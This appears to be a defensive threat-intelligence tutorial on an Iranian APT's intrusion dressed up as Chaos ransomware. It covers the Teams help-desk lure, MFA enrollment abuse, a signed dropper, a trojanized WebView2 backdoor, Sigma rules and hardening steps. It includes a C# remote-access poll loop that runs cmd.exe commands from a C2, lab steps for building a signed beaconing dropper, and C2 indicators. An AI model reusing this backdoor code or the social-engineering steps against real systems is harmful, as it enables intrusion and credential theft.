MuddyWater’s Chaos Ransomware Masquerade: Dissecting the Iranian APT’s Teams-Based Intrusion Chain, Credential Harvesting, and False-Flag Deployment

A ransom note landed. A leak site countdown started ticking. Extortion emails fanned out across the org. Every signal screamed “ransomware crew,” and that was exactly the point. When Rapid7 pulled the incident apart in early 2026, the one thing that should have been there, encrypted files, was missing. What looked like a Chaos affiliate cashing out was MuddyWater, an Iranian intelligence operation, wearing a criminal costume so the IR team would chase the wrong ghost.

Why the costume matters more than the malware

Start with the conclusion, because it reframes everything else: the ransomware was theater. Rapid7’s assessment is blunt about it. “The inclusion of extortion and negotiation elements likely aimed to focus response teams on the immediate impact, delaying detection of persistence mechanisms implanted through remote access tools.” Translation: the crime story was a distraction layer bolted on top of an espionage operation, designed to burn your analysts’ first 48 hours on a negotiation that was never real.

This is a defender problem before it is a malware problem. If your triage playbook says “ransomware listing plus extortion email equals financially motivated crime, contain and negotiate,” then a nation-state actor just programmed your response. They know how SOCs think. They know the moment a Chaos logo shows up on a Tor leak site, half the room pivots to ransom posture, legal gets looped in, and nobody is asking why a renamed pythonw.exe is talking to an IP in the Hetzner range. That gap, the one between “we think we know what this is” and “we actually traced the kill chain,” is the entire operational value of the false flag.

So the way to read this campaign is backwards from the tell. The tell is the absence of encryption. Everything upstream of that, the Teams lure, the credential capture, the signed dropper, the trojanized WebView2 binary, exists to harvest credentials and exfiltrate data while the downstream noise keeps you looking the other way.

Who MuddyWater actually is

MuddyWater goes by a zoo of names depending on which vendor’s taxonomy you read: Mango Sandstorm (Microsoft), Mercury, Seedworm (Symantec), Static Kitten. The US government has linked the group directly to Iran’s Ministry of Intelligence and Security. CISA’s language is unusually direct, describing Seedworm as “a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).” This is not a loose affiliation or a contractor relationship of convenience. It is a state intelligence apparatus.

Active since 2017, the group cut its teeth on Middle Eastern targets and then widened the aperture to telecommunications, defense, local government, and oil and gas across Asia, Africa, Europe, and North America. They operate exclusively against Windows. Their early reputation was built on fileless, PowerShell-driven intrusions engineered to leave as little on disk as possible. That heritage matters, because the 2026 campaign is what happens when a fileless-first APT decides it wants the loud, attention-grabbing cover of a ransomware brand without abandoning its quiet tradecraft underneath.

The timing is geopolitical. Through 2026, against a backdrop of US, Israel, and Iran tension, MuddyWater’s operational tempo climbed: intrusions touched a US bank, an airport, and software companies. False-flag activity is a strategic response to that exposure. When your operations keep getting attributed back to MOIS, you change the costume.

Chaos: the brand they borrowed

To understand the masquerade you have to understand the mask. Chaos is a real ransomware-as-a-service operation, not a MuddyWater invention. It emerged in February 2025 in the wake of Operation Checkmate, the law enforcement action that disrupted BlackSuit’s infrastructure. Chaos filled some of that vacuum.

Its data leak site has a signature mechanic worth knowing: a “blind” countdown timer that withholds the victim’s identity until the clock runs out. The design intent is psychological, accelerating negotiations by keeping the victim guessing whether their name is about to go public. Chaos also runs a layered extortion model:

This is a sophisticated, multi-pressure criminal brand, which is precisely why it makes good cover. A defender who pulls up Chaos’s profile sees a credible financially motivated operation with documented TTPs. The brand does the legitimacy work for the attacker. Rapid7 noted that MuddyWater had deployed Qilin ransomware in a late 2025 attack on an Israeli organization and assessed that the group may have shifted to Chaos branding after that Qilin operation got tied back to MOIS. The mask is disposable. When one gets burned, they pick up another.

Stage one: the Teams lure and the IT support persona

The intrusion did not begin with an exploit or a malicious attachment. It began with a chat request.

MuddyWater initiated contact through Microsoft Teams external messaging, engaging employees directly. This is the abuse of a legitimate, federated collaboration feature. By default, many Teams tenants permit external organizations to initiate chats, and the AllowExternalAccess setting in the Teams admin center governs exactly this. When it is open, a threat actor with any Microsoft tenant can message your staff as if they were a trusted contact.

The persona is the part MuddyWater has sharpened all year: “IT Support.” The interactive Teams sessions used to harvest credentials and MFA align closely with the IT-help-desk identity the group refined throughout 2026. A user gets a message from “IT,” there is a problem with their account, can they hop on a quick screen share. The whole thing runs on the social momentum of someone who believes they are talking to their own help desk.

Once on a screen-sharing session, the actor ran basic discovery, accessed files tied to the victim’s VPN configuration, and walked users through entering credentials into locally created text files. Two distinct credential-capture vectors showed up:

1. The plaintext file path. Employees were convinced to type their passwords into a text file on their own machine. The attacker, watching the screen share, simply reads the credentials off the screen. No malware, no phishing infrastructure, no network artifact to catch. Just a human typing a secret while a stranger watches.

2. The fake Quick Assist portal. Victims were directed to phishing pages masquerading as Microsoft Quick Assist. The domain adm-pulse[.]com served as a fake Quick Assist login portal. Quick Assist is Microsoft’s legitimate remote-help tool, so the brand impersonation slots neatly into the IT-support cover story.

Then comes the move that turns a credential into durable access: MFA manipulation. Some employees were walked through adding an attacker-controlled device to their multi-factor authentication settings. This is the quiet catastrophe. A stolen password expires the next time the user resets it. An attacker-enrolled MFA device gives the adversary an enduring, self-service path back into the account that survives password rotation and looks, to the authentication system, like a perfectly legitimate second factor.

By operating interactively through compromised users, the attacker performed initial discovery, harvested credentials, manipulated MFA, and transitioned to using legitimate accounts for internal access. Notice that no exploit has fired yet. The “vulnerability” being exploited is the trust relationship between an employee and a voice claiming to be IT.

Stage two: legitimate tools, real accounts, internal access

With valid credentials and MFA control, the operation moved inside. Attackers authenticated to internal systems including a domain controller and established persistence using RDP, DWAgent, and AnyDesk.

This is the hardest phase to detect and it is hard on purpose. There is no malicious binary in a logon to a DC with a real username and a real second factor. RDP is a built-in admin protocol. DWAgent and AnyDesk are commercial remote-management tools used by legitimate IT departments every day. The following executables showed up in the environment:

The strategic logic of “living off legitimate tools” is that every one of these has a benign explanation. An EDR that alerts on AnyDesk will drown your SOC in false positives because half your help desk runs it. The attacker is hiding inside the noise floor of normal IT operations. Their persistence is not a rootkit, it is a vendor-signed remote support agent that your change-management process probably has no record of, because nobody checked change management before assuming it was sanctioned.

From there, the access was used to deploy additional payloads, move laterally, and harvest and exfiltrate data. The DC compromise is the prize. Domain controller access means the keys to the directory, which means every credential, every group membership, every trust path in the environment.

Stage three: Stagecomp, the signed dropper

Now the malware chain starts, and even here MuddyWater keeps it minimal. The first-stage downloader, internally tracked as Stagecomp, arrived as ms_upd.exe. It was installed via a simple curl command and reached out to its command-and-control domain moonzonet[.]com.

Stagecomp’s job is small and disciplined: collect system information and pull down the next stage. From the C2 it dropped three components:

The attribution gold is in the signature. ms_upd.exe was signed using a code-signing certificate under the name “Donald Gay.” That same identity has previously signed MuddyWater’s Stagecomp downloader. Per threat intelligence from March and April 2026, the certificate ties directly to MuddyWater’s “Operation Olalampo,” a campaign hitting organizations across the US and MENA. The “Donald Gay” certificate also clusters with an “Amy Cherne” certificate, and together they sign the same body of MuddyWater-attributed tooling.

Here is the practical lesson on code signing. A valid Authenticode signature does not mean trusted, it means signed. Naive allowlisting that trusts “anything signed” gets walked straight past by an attacker who simply obtained or abused a certificate. The signature’s real value to a defender is the opposite of what the attacker intended: it is a high-fidelity attribution anchor. The “Donald Gay” cert is a fingerprint linking this 2026 Chaos masquerade back through Operation Olalampo to the Fakeset and Stagecomp lineage. The thing meant to make the malware look legitimate is the thing that names the author.

In the lab, you can reproduce the deception mechanics safely. Build a minimal dropper in C# that grabs hostname, username, and OS version, beacons to a Python HTTP listener standing in for moonzonet[.]com, and writes out three files. Then sign it with a self-signed Authenticode cert via signtool.exe and watch how a signature-only check waves it through while the actual certificate chain refuses to validate. That gap is where the “Donald Gay” trick lives.

Stage four: Darkcomp, the trojanized WebView2 backdoor

The payload, game.exe, is a bespoke RAT tracked as Darkcomp, and its disguise is genuinely clever. It is a trojanized version of Microsoft’s official WebView2APISample project. WebView2 is Microsoft’s embedded-browser control, shipped and used legitimately across countless Windows apps. By starting from the real sample project, the attacker inherits authentic version metadata, a believable file description, and a plausible reason for WebView2Loader.dll to sit next to it.

That neighboring DLL is the side-loading cover. When WebView2APISample.exe loads a real WebView2Loader.dll, the process looks, to a casual AV scan, like an ordinary WebView2 application. The legitimate DLL launders the binary’s appearance.

Darkcomp’s execution flow is patient and quiet:

1. Anti-analysis and anti-VM checks first. Before it touches the network, it runs environment checks designed to detect sandboxes and analysis VMs. In a lab analog you would mirror these with CPUID hypervisor-bit inspection and RDTSC timing deltas, the classic tells that the code is running under emulation or a debugger.
2. Decrypt the config. It reads visualwincomp.txt, an encrypted configuration file, to obtain its C2 address. Storing the C2 in an encrypted external config rather than hardcoding it keeps the destination out of plain static strings and lets the operators rotate infrastructure without rebuilding the binary.
3. Beacon and poll. It sends victim host information to the C2 at uploadfiler[.]com over port 443, then infinitely polls the server for commands every 60 seconds.
4. Execute on command. It supports 12 commands, covering execution via cmd.exe or PowerShell, writing base64-encoded files to disk, deleting files, and starting and stopping interactive shells.

A second sample seen in the wild (SHA256 3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90) implements the identical logic but masquerades as WebView2.exe instead of Game.exe. Same engine, different name on the badge.

Conceptually the poll loop is unremarkable, and that is the point. Here is the shape of it, illustrative only:

// Darkcomp-analog poll loop (lab illustration, not the real sample)
string c2 = DecryptConfig("visualwincomp.txt");   // XOR/AES with embedded key
SendBeacon(c2, CollectHostInfo());                  // hostname, user, OS
while (true)
{
    var cmd = HttpGet($"https://{c2}/poll");        // 60s interval
    if (cmd?.type == "exec")
    {
        var output = RunHidden("cmd.exe", "/c " + cmd.payload);
        HttpPost($"https://{c2}/result", output);
    }
    else if (cmd?.type == "write")
        File.WriteAllBytes(cmd.path, Convert.FromBase64String(cmd.data));
    Thread.Sleep(60000);
}

Nothing about that is exotic. The sophistication is not in the RAT’s cleverness, it is in the layers of legitimacy wrapped around it: a real sample project, a real DLL, a valid signature on the dropper, and a 60-second cadence that blends into normal HTTPS traffic.

Stage five: the pythonw.exe injection signature

One artifact ties this campaign to MuddyWater’s deeper tradecraft regardless of which ransomware brand is on top: the group’s signature use of a renamed pythonw.exe to inject code into suspended processes. In this intrusion, a renamed pythonw.exe reached out to 116.203.208[.]186.

Why pythonw.exe? It is the windowless variant of the Python interpreter, no console window pops up. Renamed and dropped on a host, it provides a flexible, scriptable execution engine that does not carry the same suspicion as a fresh unknown binary, while the process-injection-into-suspended-process pattern provides memory-resident execution that leaves minimal disk footprint. This is the fileless DNA from the group’s 2017-era operations, still beating under the 2026 ransomware costume.

For a defender, this is the consistency that survives the masquerade. Brands change. Ransomware logos change. The renamed-pythonw.exe-into-suspended-process technique persists across campaigns, which makes it one of the most reliable behavioral fingerprints you can hunt for.

The endgame: extortion that was always fake

With data exfiltrated and persistence seeded, MuddyWater executed the cover story. They sent emails to multiple users threatening to leak stolen information unless a ransom was paid, and directed the victim to the Chaos leak site with its Tor negotiation address hptqq2o2qjva7lcaaq67w36jihzivkaitkexorauw7b2yul2z6zozpqd[.]onion.

Then the tell, the detail that unravels the whole performance. A follow-up email told recipients to find a “note” containing credentials for a secure chat to continue negotiations. The note was never found. The stolen data was simply leaked online. There was no real negotiation channel because there was never a real intent to negotiate. And crucially, despite all the Chaos artifacts, no files were encrypted.

Rapid7’s framing is the load-bearing insight: “the apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a deviation from typical ransomware behavior. This inconsistency may indicate that the ransomware component functioned primarily as a facilitating or obfuscation mechanism, rather than as the primary objective of the intrusion.”

A real Chaos affiliate’s economic model depends on encryption, that is the leverage that makes victims pay. An espionage operation does not want to encrypt anything, because encryption is destructive, noisy, and counterproductive when your goal is quiet, sustained collection. The missing crypto is the seam where the costume doesn’t quite fit.

Reading the attribution

No single artifact proves MuddyWater. The case is built by correlation, and it is worth seeing how the pieces stack to a confident judgment:

Any one of these alone is suggestive. Together they form a chain where the certificate lineage, the infrastructure overlap, the injection technique, and the persona all point at the same actor, while the false-flag behavior explains why it was dressed up as something else. That is how you reach a defensible attribution judgment without a confession.

Detection and defense: seeing through the mask

The job here is not just to detect malware, it is to detect the espionage operation underneath a convincing crime story. Map your telemetry to the kill chain and the cover stops working.

Telemetry mapped to the chain

ETW providers worth wiring up

• Microsoft-Windows-PowerShell/Operational (GUID A0C1853B-5C40-4B15-8766-3CF1C58F985A) with ScriptBlock logging to catch the encoded PowerShell Darkcomp dispatches.
• Microsoft-Windows-Threat-Intelligence for process-injection visibility via PsSetCreateProcessNotifyRoutine, the pythonw.exe tradecraft.
• Microsoft-Windows-DNS-Client/Operational for C2 domain resolution.
• Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational for RDP session establishment to the DC.

Detection logic that targets the actual TTPs

A Sigma rule for the trojanized WebView2 binary talking to the internet cuts straight at Darkcomp:

title: WebView2APISample Suspicious Outbound Connection
status: experimental
logsource:
  product: windows
  category: network_connection
detection:
  selection:
    Image|endswith:
      - '\Game.exe'
      - '\WebView2APISample.exe'
      - '\WebView2.exe'
    Initiated: 'true'
  filter_legitimate:
    DestinationIp|startswith:
      - '10.'
      - '192.168.'
      - '172.16.'
  condition: selection and not filter_legitimate
level: critical
tags:
  - attack.command_and_control
  - attack.t1071.001

The renamed-interpreter injection is one of the highest-signal hunts you can run:

title: pythonw.exe CreateRemoteThread into Process
status: experimental
logsource:
  product: windows
  category: create_remote_thread
detection:
  selection:
    SourceImage|endswith: '\pythonw.exe'
  condition: selection
level: critical
tags:
  - attack.defense_evasion
  - attack.t1055

And the correlation that catches the social-engineering-to-persistence pivot: a remote-management tool service (DWAgent, AnyDesk, dwagsvc) installed within roughly an hour of an external Teams message, cross-referenced against change-management records. If IT did not schedule it, it is not IT.

Hardening that closes the front door

The detections above catch the operation in progress. These controls deny it the entry it relied on:

1. Lock down Teams external access. Set ExternalAccessPolicy to explicitly allowlist known partner tenants and disable external chat for non-executive roles. This single change kills the initial-access vector.
2. Gate MFA enrollment. Use Entra ID Conditional Access and Authentication Strength to require a Temporary Access Pass, a compliant device, or manager approval for any new authenticator enrollment. Alert on every AuthenticationMethodsUpdated event. Attacker-enrolled MFA is the persistence that survives a password reset.
3. Allowlist remote-management tools. Use AppLocker or WDAC to block DWAgent, AnyDesk, and Quick Assist except for sanctioned IT change. RMT abuse is the persistence layer the false flag was meant to hide.
4. Protect VPN config files. Apply tight NTFS ACLs and audit read access (Event ID 4663) on VPN configuration directories, exactly the files the actor went after during screen shares.
5. Treat signed as a clue, not a pass. Enforce WDAC with proper certificate-chain validation rather than signature-only trust. A “Donald Gay” certificate should be a detection, not a green light.

The triage rule that defeats the masquerade

When a ransomware listing appears, do not let the leak site set your posture. Ask the question that unravels the costume: is anything actually encrypted? If the Chaos artifacts are present but no files are locked, you are very likely looking at an espionage operation using ransomware as cover. Pivot immediately from negotiation posture to a full hunt for persistence, credential theft, and exfiltration. The extortion email is bait designed to consume your first 48 hours. Spend them on the kill chain instead.

This is not a one-off. MuddyWater’s trajectory through ransomware brands tells the whole story: PowGoop-delivered Thanos with destructive intent in 2020, the DarkBit persona with DEV-1084 in 2023, Qilin in late 2025, and now Chaos in 2026. Each time, criminal branding provides attribution confusion, deters victim reporting, and misdirects IR resources. MuddyWater is not alone in this, the convergence of state actors with the criminal MaaS ecosystem is a defining pattern of the current threat landscape. The ransomware brand is increasingly a disposable wrapper around a state objective.

Key takeaways

• The missing encryption is the tell. Genuine ransomware encrypts because that is the leverage. Chaos artifacts with no encrypted files means you are probably looking at espionage wearing a crime costume.
• The lure is a Teams chat, not an exploit. MuddyWater’s initial access ran on an IT-support persona over external Teams messaging. Lock down AllowExternalAccess and you close the front door.
• MFA enrollment abuse is the real persistence. A stolen password expires. An attacker-enrolled authenticator survives password resets and looks legitimate. Gate enrollment and alert on every AuthenticationMethodsUpdated.
• “Signed” is an attribution clue, not a trust verdict. The “Donald Gay” certificate did not make the malware safe, it named the author. Validate full certificate chains, never trust on signature presence alone.
• Hunt the tradecraft that outlives the brand. Renamed pythonw.exe injecting into suspended processes is MuddyWater’s fingerprint across every ransomware costume they have worn. That behavior, not the logo on the leak site, is what you detect.
• Rewrite your ransomware triage. When a leak site appears, ask “is anything encrypted” before you assume crime. The extortion narrative exists to burn your first 48 hours. Spend them hunting persistence.

Related Tutorials

• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• OSINT for People and Credentials: LinkedIn, Breach Data, and Email Harvesting

References

• Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware – Rapid7 Blog
• MuddyWater (G0069) – MITRE ATT&CK Group Page
• MuddyWater Uses Microsoft Teams to Steal Credentials in False Flag Ransomware Attack – The Hacker News
• Iranian APT Intrusion Masquerades as Chaos Ransomware Attack – SecurityWeek
• MuddyWater Leverages Microsoft Teams for Credential Theft in False-Flag Ransomware Attack – Xcitium Threat Labs
• Iranian Cyber Espionage Disguised as a Chaos Ransomware Attack – Security Affairs